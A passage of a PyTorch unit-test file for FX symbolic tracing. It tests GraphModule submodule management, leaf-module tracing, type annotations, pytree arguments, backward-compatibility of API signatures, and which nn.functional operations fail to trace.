Test that the "conv" node is NOT still there conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"] self.assertEqual(conv, []) a.delete_submodule("net_b.net_c.conv") # Test that the "conv" submodule is now gone self.assertFalse(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with a deleted submodule with self.assertRaisesRegex(AttributeError, "has no attribute " "`conv`"): self.assertIsNone(a.get_submodule("net_b.net_c.conv")) # Test `get_attr` warnings cat = [n for n in a.graph.nodes if n.target == torch.cat][-1] with a.graph.inserting_before(cat): with warnings.catch_warnings(record=True) as w: param = a.graph.get_attr(qualified_name="net_b.net_c.param") self.assertEqual(len(w), 0) with self.assertWarnsRegex(UserWarning, "Attempted to " "insert a get_attr Node with no " "underlying reference in the " "owning GraphModule"): bad_param = a.graph.get_attr(qualified_name="net_b.param") a.graph.erase_node(bad_param) cat.args = (*cat.args, param) a.recompile() a.graph.lint() # Test `get_parameter` a.get_parameter("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "is not an " "nn.Parameter"): a.get_parameter("net_b.buf") with self.assertRaisesRegex(AttributeError, "has no attribute " "`param`"): a.get_parameter("net_b.param") # Test `get_buffer` a.get_buffer("net_b.buf") with self.assertRaisesRegex(AttributeError, "is not a " "buffer"): a.get_buffer("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "has no attribute " "`buf`"): a.get_buffer("net_b.net_c.buf") # Test non-nested attributes a.get_submodule("") a.get_parameter("param") # Insert some unused submodules a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2)) a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100)) # Garbage collection a.delete_all_unused_submodules() # Test that all the unused submodules are gone 
self.assertFalse(module_exists(a, "net_b.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.rnn")) self.assertFalse(module_exists(a, "batch_norm_2d")) # Test that we didn't delete any unused Parameters or buffers self.assertTrue(parameter_exists(a, "net_b.net_c.param")) self.assertTrue(buffer_exists(a, "net_b.buf")) a.graph.lint() def test_tracing_graphmodules_as_leaf_submodules(self): class A(torch.nn.Module): def forward(self, t): return t + t class B(torch.nn.Module): def __init__(self): super(type(self), self).__init__() self.calling = False self.called = False def forward(self, t): if self.calling: return t - t else: return t + t def __call__(self, *args): self.called = True self.calling = True return super(type(self), self).__call__(*args) self.calling = False class M(torch.nn.Module): def __init__(self, a, b): super().__init__() self.a = a self.b = b def forward(self, t): x = self.a(t) y = self.b(t) return x + y class LeafTracer(Tracer): def is_leaf_module(self, module, name): return True class LeafTracerNotB(Tracer): def is_leaf_module(self, module, name): return False if "b" in name else True # Recompile calls added "for fun", since they # chain __call__ wrappers. # # Test: B as a regular, non-leaf module # a = symbolic_trace(A()) a.recompile() m = M(a, B()) graph = LeafTracerNotB().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is not treated as leaf. self.assertFalse(hasattr(gm, "b")) # Test assert custom __call__ on submodule b was honored. 
match = [ n for n in gm.graph.nodes if n.op == "call_function" and n.target == operator.sub ] self.assertTrue(len(match) == 1) # # Test: B as a regular, leaf module # symbolic_trace should only patch torch.nn.Module.__call__, # which means B.__call__ should still execute # a = symbolic_trace(A()) a.recompile() b = B() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is leaf: self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) # Test b.__call__ was run self.assertTrue(b.called) self.assertTrue(gm.get_submodule("b").called) # # Test: B as GraphModule leaf # __call__ not honored since symbolic_trace directly invokes forward() # a = symbolic_trace(A()) a.recompile() b = symbolic_trace(B()) b.recompile() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer("my_buff", torch.rand(3, 4)) self.register_parameter( "my_param", torch.nn.Parameter(torch.rand(3, 4)) ) def forward(self, x): return x + self.my_buff + self.my_param mod = MyModule() mod_traced = symbolic_trace(mod) # Create new GraphModule based on original, either 
w/ dict or root module. orig_buff = mod_traced.get_buffer("my_buff") orig_param = mod_traced.get_parameter("my_param") mod_traced_new = GraphModule( {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod, mod_traced.graph, ) # Check that both my_buff and my_param are found and the same. try: new_buff = mod_traced_new.get_buffer("my_buff") except Exception: self.fail("Did not find my_buff") self.assertEqual(orig_buff, new_buff) try: new_param = mod_traced_new.get_parameter("my_param") except Exception: self.fail("Did not find my_param") self.assertEqual(orig_param, new_param) x = torch.rand(3, 4) orig_out = mod_traced(x) submodules_out = mod_traced_new(x) self.assertEqual(orig_out, submodules_out) def test_graph_module_init_buffer_param_copied_dict_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=True) def test_graph_module_init_buffer_param_copied_mod_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=False) def test_annotations_with_no_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: torch.Tensor, a: A) -> torch.Tensor: return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor': return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor: return a(x[0]) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_internal_forward_references(self): class A: def 
__call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor': return a(x)[0] self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) @unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature " "`annotations` is not defined in Python <3.7") def test_annotation_with_future(self): try: import fx.test_future # noqa: F401 finally: del sys.modules["__future__"] def test_annotations_empty_tuple(self): class Foo(torch.nn.Module): def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]): return "foo" traced = torch.fx.symbolic_trace(Foo()) x = () y = ("bar", ()) traced(x, y) FileCheck().check("_Tuple[()]") \ .check("typing_Tuple[str,typing_Tuple[()]]") \ .run(traced.code) scripted = torch.jit.script(traced) scripted(x, y) FileCheck().check("Tuple[()]") \ .check("Tuple[str, Tuple[()]]") \ .run(scripted.code) @skipIfNoTorchVision def test_cpatcher(self): cnt = 0 def patched_impl(to_patch, args, kwargs): nonlocal cnt cnt += 1 return to_patch(*args, **kwargs) c_patch_enabled = True def patched_in(to_patch, args, kwargs): nonlocal c_patch_enabled try: c_patch_enabled = False r = patched_impl(to_patch, args, kwargs) finally: c_patch_enabled = True return r def trace_func(frame, action, arg): if action == 'c_call': if c_patch_enabled: torch._C._fx.patch_function(arg, patched_in) import torch rn = torchvision_models.resnet18() try: sys.setprofile(trace_func) rn(torch.rand(1, 3, 224, 224)) print("testing print patch") finally: sys.setprofile(None) assert(cnt != 0) def test_randn(self): def f(): return torch.randn(3, 3) fx_f = symbolic_trace(f, enable_cpatching=True) assert(any(i.target == torch.randn for i in fx_f.graph.nodes)) fx_f = symbolic_trace(f, enable_cpatching=False) assert(all(i.target != torch.randn for i in fx_f.graph.nodes)) fx_f = symbolic_trace(f, enable_cpatching=True) assert(any(i.target == torch.randn for i in fx_f.graph.nodes)) def test_pytree(self): def 
f_sum(x): return sum(x) def f_sum_dict(x): out = 0 for k, v in x.items(): out += v return out def f_dict_list_map(x): new_dict = {} for k, v in x.items(): new_dict[k] = [i + 1 for i in v] return new_dict def f_dict_add(x): return x['a'] + sum(x['z']) def f_namedtuple_add(x): return x.x + x.y pytree._register_pytree_node( Foo, lambda x: ([x.a, x.b], None), lambda x, _: Foo(x[0], x[1]), ) fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b]) def f_custom(x): return x.a + x.b def f_custom_dict(x): return f_sum_dict(x.a) + x.b def f_return_custom(x): return Foo(x.b, x.a) tests = [ (f_sum, [PH, PH, PH]), (f_sum, []), (f_sum_dict, {'a': PH, 'b': PH, 'c': PH}), (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}), (f_dict_list_map, {5: (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': []}), (f_custom, Foo(PH, PH)), (f_custom, Foo(PH, 3)), (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)), # (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees (f_namedtuple_add, Point(PH, PH)), ] def verify_pytree(f, inp): val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]]) orig_out = f(val) nf = symbolic_trace(f, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) nf = symbolic_trace(nf) self.assertEqual(nf(val), orig_out) assert "tree_flatten_spec" not in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1) nf = symbolic_trace(nf, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) pickled = pickle.dumps(nf) nf = pickle.loads(pickled) self.assertEqual(nf(val), orig_out) for f, inp in tests: verify_pytree(f, inp) def 
test_pytree_concrete(self): def f(b, a): if b: return a['a'] else: return a['z'] inp = {'a': {'a': PH, 'z': PH}, 'b': True} nf = symbolic_trace(f, concrete_args=inp) val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) self.assertEqual(nf(**val), f(**val)) nf = symbolic_trace(nf) self.assertEqual(nf(**val), f(**val)) def run_getitem_target(): from torch.fx._symbolic_trace import _wrapped_methods_to_patch _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__")) try: TestFX().getitem_inner() finally: _wrapped_methods_to_patch.pop() class TestOperatorSignatures(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag @onlyCPU @ops(op_db, allowed_dtypes=(torch.float,)) def test_get_torch_func_signature_exhaustive(self, device, dtype, op): # Sorted and one entry on each line to minimize merge conflicts. known_no_schema = {'block_diag', 'broadcast_tensors', 'cdist', 'contiguous', 'dstack', 'einsum', 'expand', 'expand_as', 'fill_', 'hstack', 'igamma', 'igammac', 'linalg.multi_dot', 'lu', 'norm', 'polygamma', 'special.polygamma', 'repeat', 'reshape_as', 'resize_', 'resize_as_', 'special.zeta', 'stack', 'to_sparse', 'view', 'view_as', 'nn.functional.hardshrink', 'vstack', 'where', 'zero_', '__getitem__', '__radd__', '__rsub__', '__rmul__', '__rdiv__', '__rmod__', '__rpow__', '__rand__', '__ror__', '__rxor__', '__rmatmul__'} try: sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False) schemas = get_signature_for_torch_op(op.op) if not schemas: raise RuntimeError('No Schemas Returned') for sample_input in sample_inputs_itr: # Iterate through overloads until we hit a match. 
If we exit this # loop via `else`, we haven't found a match for schema in schemas: try: bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs) bound_args.apply_defaults() op(*bound_args.args, **bound_args.kwargs) break except TypeError as e: pass else: raise RuntimeError(f'Did not match any schemas for op {op.name}!') except Exception as e: assert op.name in known_no_schema or "nn.functional" in op.name class TestFXAPIBackwardCompatibility(JitTestCase): def setUp(self): self.maxDiff = None # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def _fn_to_stable_annotation_str(self, obj): """ Unfortunately we have to serialize function signatures manually since serialization for `inspect.Signature` objects is not stable across python versions """ fn_name = torch.typename(obj) signature = inspect.signature(obj) sig_str = f'{fn_name}{signature}' arg_strs = [] for k, v in signature.parameters.items(): maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\ if v.annotation is not inspect.Signature.empty else '' def default_val_str(val): if isinstance(val, (tuple, list)): str_pieces = ['(' if isinstance(val, tuple) else '['] str_pieces.append(', '.join(default_val_str(v) for v in val)) if isinstance(val, tuple) and len(str_pieces) == 2: str_pieces.append(',') str_pieces.append(')' if isinstance(val, tuple) else ']') return ''.join(str_pieces) # Need to fix up some default value strings. # First case: modules. Default module `repr` contains the FS path of the module. # Don't leak that if isinstance(val, types.ModuleType): return f'<module {val.__name__}>' # Second case: callables. 
Callables (such as lambdas) encode their address in # their string repr. Don't do that if callable(val): return f'<function {val.__name__}>' return str(val) if v.default is not inspect.Signature.empty: default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'" maybe_default = f' = {default_val_str}' else: maybe_default = '' maybe_stars = '' if v.kind == inspect.Parameter.VAR_POSITIONAL: maybe_stars = '*' elif v.kind == inspect.Parameter.VAR_KEYWORD: maybe_stars = '**' arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}') return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\ if signature.return_annotation is not inspect.Signature.empty else '' return f'{fn_name}({", ".join(arg_strs)}){return_annot}' def _annotation_type_to_stable_str(self, t, sig_str): if t is inspect.Signature.empty: return '' # Forward ref if isinstance(t, str): return f"'{t}'" if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef): return t.__forward_arg__ if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef): return t.__forward_arg__ trivial_mappings = { str : 'str', int : 'int', float: 'float', bool: 'bool', torch.dtype: 'torch.dtype', torch.Tensor: 'torch.Tensor', torch.device: 'torch.device', torch.memory_format: 'torch.memory_format', slice: 'slice', torch.nn.Module: 'torch.nn.modules.module.Module', torch.fx.Graph : 'torch.fx.graph.Graph', torch.fx.Node : 'torch.fx.node.Node', torch.fx.Proxy : 'torch.fx.proxy.Proxy', torch.fx.node.Target : 'torch.fx.node.Target', torch.fx.node.Argument : 'torch.fx.node.Argument', torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode', torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule', torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match', Ellipsis : '...', typing.Any: 'Any', type(None): 'NoneType', None: 'None', typing.Iterator: 'Iterator', } mapping = trivial_mappings.get(t, None) 
if mapping: return mapping # Handle types with contained types contained = getattr(t, '__args__', None) or [] # Callables contain a bare List for arguments contained = t if isinstance(t, list) else contained # Python 3.8 puts type vars into __args__ for unbound types such as Dict if all(isinstance(ct, typing.TypeVar) for ct in contained): contained = [] contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained] contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else '' origin = getattr(t, '__origin__', None) if origin is None: # Unbound types don't have `__origin__` in some Python versions, so fix that up here. origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin if origin in {tuple, typing.Tuple}: return f'Tuple{contained_type_str}' if origin in {typing.Union}: # Annoying hack to detect Optional if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)): not_none_param = contained[0] if contained[0] is not type(None) else contained[1] return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]' return f'Union{contained_type_str}' if origin in {dict, typing.Dict}: return f'Dict{contained_type_str}' if origin in {list, typing.List}: return f'List{contained_type_str}' if origin in {type, typing.Type}: return f'Type{contained_type_str}' if isinstance(t, typing.Callable): if len(contained) > 0 and contained[0] is not Ellipsis: return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]' else: return f'Callable{contained_type_str}' raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.' 
f'Please add support for this type and confirm with the ' f'FX team that your signature change is valid.') def test_function_back_compat(self): """ Test backward compatibility for function signatures with @compatibility(is_backward_compatible=True). Currently this checks for exact signature matches, which may lead to false positives. If this becomes too annoying, we can refine this check to actually parse out the saved schema strings and check if the change is truly backward- incompatible. """ signature_strs = [] for obj in _BACK_COMPAT_OBJECTS: if not isinstance(obj, type): signature_strs.append(self._fn_to_stable_annotation_str(obj)) signature_strs.sort() try: self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \ f"as backwards-compatible has experienced a signature change. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_class_member_back_compat(self): """ Test backward compatibility for members of classes with @compatibility(is_backward_compatible=True). Currently this checks for exact matches on the publicly visible members of the class. """ class_method_strs = [] for obj in _BACK_COMPAT_OBJECTS: if isinstance(obj, type): public_members = [name for name in obj.__dict__ if not name.startswith('_')] class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}') class_method_strs.sort() try: self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \ f"as backwards-compatible has experienced change in its public members. 
See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_public_api_surface(self): mod = torch.fx non_back_compat_objects = {} def check_symbols_have_bc_designation(m, prefix): if not m.__name__.startswith('torch.fx'): return if m.__name__.startswith('torch.fx.experimental'): return for k, v in m.__dict__.items(): if v is m: continue if k.startswith('_'): continue if isinstance(v, types.ModuleType): check_symbols_have_bc_designation(v, prefix + [k]) elif isinstance(v, type) or isinstance(v, types.FunctionType): if v not in _MARKED_WITH_COMATIBLITY: non_back_compat_objects.setdefault(v) check_symbols_have_bc_designation(mod, ['torch', 'fx']) non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()] # Only want objects in torch.fx non_back_compat_strs = [ s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')] # Only want objects in public namespaces non_back_compat_strs = [ s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))] non_back_compat_strs.sort() if len(non_back_compat_strs) != 0: raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a " f"backwards-compatibility classification! 
Please decorate these " f"API(s) with `@torch.fx._compatibility.compatibility` to specify " f"BC guarantees.") class TestFunctionalTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary", "has_torch_function_variadic", "handle_torch_function", "boolean_dispatch") TO_PATCH = {"has_torch_function": None, "has_torch_function_unary": None, "has_torch_function_variadic": None} BUILT_IN_FUNC = (AssertionError, "") PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable") PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default") ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$") CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow") INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined") MUTABLE = (RuntimeError, r"Tried to trace mutable operation") UNTRACEABLE_FUNCTIONALS = { "adaptive_avg_pool1d": BUILT_IN_FUNC, "avg_pool1d": BUILT_IN_FUNC, "avg_pool2d": BUILT_IN_FUNC, "avg_pool3d": BUILT_IN_FUNC, "celu_": BUILT_IN_FUNC, "channel_shuffle": BUILT_IN_FUNC, "conv1d": BUILT_IN_FUNC, "conv2d": BUILT_IN_FUNC, "conv3d": BUILT_IN_FUNC, "conv_tbc": BUILT_IN_FUNC, "conv_transpose1d": BUILT_IN_FUNC, "conv_transpose2d": BUILT_IN_FUNC, "conv_transpose3d": BUILT_IN_FUNC, "cosine_similarity": BUILT_IN_FUNC, "elu_": BUILT_IN_FUNC, "hardtanh_": BUILT_IN_FUNC, "leaky_relu_": BUILT_IN_FUNC, "logsigmoid": BUILT_IN_FUNC, "one_hot": BUILT_IN_FUNC, "pdist": BUILT_IN_FUNC, "pixel_shuffle": BUILT_IN_FUNC, 
"pixel_unshuffle": BUILT_IN_FUNC, "relu_": BUILT_IN_FUNC, "rrelu_": BUILT_IN_FUNC, "selu_": BUILT_IN_FUNC, "softplus": BUILT_IN_FUNC, "softshrink": BUILT_IN_FUNC, "threshold_": BUILT_IN_FUNC, "adaptive_avg_pool2d": LEN_ERROR, "adaptive_avg_pool3d": LEN_ERROR, "adaptive_max_pool2d_with_indices": LEN_ERROR, "adaptive_max_pool3d_with_indices": LEN_ERROR, "instance_norm": CONTROL_FLOW, "pad": LEN_ERROR, "adaptive_max_pool1d": PROXY_ITERABLE, "adaptive_max_pool2d": PROXY_ITERABLE, "adaptive_max_pool3d": PROXY_ITERABLE, "fractional_max_pool2d": PROXY_ITERABLE, "fractional_max_pool3d": PROXY_ITERABLE, "max_pool1d": PROXY_ITERABLE, "max_pool2d": PROXY_ITERABLE, "max_pool3d": PROXY_ITERABLE, "group_norm": PROXY_ITERATED, "lp_pool2d": PROXY_ITERATED, "max_unpool1d": PROXY_ITERATED, "max_unpool2d": PROXY_ITERATED, "max_unpool3d": PROXY_ITERATED, "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH, "hardshrink": ARG_TYPE_MISMATCH, "layer_norm": ARG_TYPE_MISMATCH, "lp_pool1d": ARG_TYPE_MISMATCH, "max_pool1d_with_indices": ARG_TYPE_MISMATCH, "max_pool2d_with_indices": ARG_TYPE_MISMATCH, "max_pool3d_with_indices": ARG_TYPE_MISMATCH, "pairwise_distance": ARG_TYPE_MISMATCH, "affine_grid": CONTROL_FLOW, "alpha_dropout": CONTROL_FLOW, "batch_norm": CONTROL_FLOW, "binary_cross_entropy": CONTROL_FLOW, "binary_cross_entropy_with_logits": CONTROL_FLOW, "celu": CONTROL_FLOW, "cosine_embedding_loss": CONTROL_FLOW, "cross_entropy": CONTROL_FLOW, "ctc_loss": CONTROL_FLOW, "dropout": CONTROL_FLOW, "dropout2d": CONTROL_FLOW, "dropout3d": CONTROL_FLOW, "elu": CONTROL_FLOW, "embedding": CONTROL_FLOW, "embedding_bag": CONTROL_FLOW, "feature_alpha_dropout": CONTROL_FLOW, "fold": CONTROL_FLOW, "gaussian_nll_loss": CONTROL_FLOW, "glu": CONTROL_FLOW, "grid_sample": CONTROL_FLOW, "gumbel_softmax": CONTROL_FLOW, "hardsigmoid": CONTROL_FLOW, "hardswish": CONTROL_FLOW, "hardtanh": 
CONTROL_FLOW, "hinge_embedding_loss": CONTROL_FLOW, "huber_loss": CONTROL_FLOW, "interpolate": CONTROL_FLOW, "kl_div": CONTROL_FLOW, "l1_loss": CONTROL_FLOW, "leaky_relu": CONTROL_FLOW, "local_response_norm": CONTROL_FLOW, "margin_ranking_loss": CONTROL_FLOW, "mse_loss": CONTROL_FLOW, "multi_head_attention_forward": CONTROL_FLOW, "multi_margin_loss": CONTROL_FLOW, "multilabel_margin_loss": CONTROL_FLOW, "multilabel_soft_margin_loss": CONTROL_FLOW, "nll_loss": CONTROL_FLOW, "poisson_nll_loss": CONTROL_FLOW, "relu": CONTROL_FLOW, "relu6": CONTROL_FLOW, "rrelu": CONTROL_FLOW, "selu": CONTROL_FLOW, "silu": CONTROL_FLOW, "mish": CONTROL_FLOW, "smooth_l1_loss": CONTROL_FLOW, "soft_margin_loss": CONTROL_FLOW, "threshold": CONTROL_FLOW, "triplet_margin_loss": CONTROL_FLOW, "triplet_margin_with_distance_loss": CONTROL_FLOW, "unfold": CONTROL_FLOW, "upsample": CONTROL_FLOW, "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT, "upsample_nearest": INTERPOLATE_ARGS_CONFLICT, "normalize" : MUTABLE, } # List of nn.functionals with Tensor inputs but not with type annotation FUNCTIONALS_WITHOUT_ANNOTATION = ( "adaptive_max_pool1d", "adaptive_max_pool2d", "adaptive_max_pool3d", "fractional_max_pool2d", "fractional_max_pool3d", "max_pool1d", "max_pool2d", "max_pool3d", "gaussian_nll_loss", "upsample", "upsample_bilinear", "upsample_nearest", ) # Inconsistent behavior between Python 3.8 and other Python versions: # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED` # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same # internal exception above # Use the following map to override the expected exception for Python 3.8 UNTRACEABLE_FUNCTIONALS_PY38 = { "adaptive_max_pool1d": PROXY_ITERATED, "adaptive_max_pool2d": PROXY_ITERATED, "adaptive_max_pool3d": PROXY_ITERATED, "fractional_max_pool2d": PROXY_ITERATED, "fractional_max_pool3d": PROXY_ITERATED, "max_pool1d": PROXY_ITERATED, "max_pool2d": PROXY_ITERATED, "max_pool3d": PROXY_ITERATED, "group_norm": 
LEN_ERROR } @classmethod def _get_functional(cls): functional_list = [] for f in dir(torch.nn.functional): if not f.islower(): continue # Ignore internal functions if f.startswith('_'): continue # Ignore supporting functions if f in cls.IGNORE_FUNCS: continue fn = getattr(torch.nn.functional, f) # Ignore non-callable object like modules if not isinstance(fn, Callable): continue if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION: try: sig = inspect.signature(fn) has_tensor_arg = False for arg, param in sig.parameters.items(): if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor): has_tensor_arg = True if not has_tensor_arg: continue # No signature or Object is not supported except ValueError: pass functional_list.append((f, fn)) return functional_list @classmethod def generate_test_func(cls, func_name, fn): def functional_test(self): if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \ sys.version_info >= (3, 8) and sys.version_info < (3, 10): exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) elif func_name in self.UNTRACEABLE_FUNCTIONALS: exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) else: symbolic_trace(fn) return functional_test @classmethod def generate_tests(cls): functional_list = cls._get_functional() for func_name, fn in functional_list: test_name = "test_nn_functional_" + func_name functional_test = cls.generate_test_func(func_name, fn) setattr(cls, test_name, functional_test) @classmethod def setUpClass(cls): def no(*args, **kwargs): return False for name in cls.TO_PATCH.keys(): cls.TO_PATCH[name] = getattr(torch.nn.functional, name) setattr(torch.nn.functional, name, no) @classmethod def tearDownClass(cls): for name in cls.TO_PATCH.keys(): setattr(torch.nn.functional, name, cls.TO_PATCH[name]) TestFunctionalTracing.generate_tests() instantiate_device_type_tests(TestOperatorSignatures, globals()) 
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
    """Auto-generated tests that symbolically trace every torchvision model
    and, where supported, round-trip the traced GraphModule through
    TorchScript, checking traced/scripted outputs match the eager model.
    """

    def setUp(self):
        # Checking for mutable operations while tracing is feature flagged
        # Enable it in testing but not by default
        self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
        torch.fx.proxy.TracerBase.check_mutable_operations = True

    def tearDown(self):
        # Restore the global flag so other test classes are unaffected.
        torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag

    # (exception type, message regex) pairs describing known failure modes.
    PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
    INCONSISTENT_TYPE = (
        RuntimeError,
        r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
    )

